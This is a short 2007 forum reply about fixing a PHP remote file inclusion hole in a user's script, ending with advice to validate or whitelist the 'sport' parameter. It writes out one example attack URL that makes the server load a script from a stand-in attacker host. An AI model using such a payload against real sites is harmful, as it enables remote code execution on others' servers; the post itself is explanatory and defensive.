|
|
Posted by Colin McKinnon on 01/15/07 22:50
SA SA wrote:
> Hello,
> I do not know anything about PHP but thrown into this mix. I was told
> by my ISP that there is vulnerability in following code to allow
> spammer load an offsite php script for mailing.
There are 2 very odd things about this:
1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)
2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).
To exploit this, someone just has to enter a URL like:
http://www.sasas-site.com/code.php?sport=http%3A%2F%2Fwww.blackhat.net%2Fmalware.src
to get there code into your ISPs webserver.
> how od i fix it?
>
Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.
C.
Navigation:
[Reply to this message]
|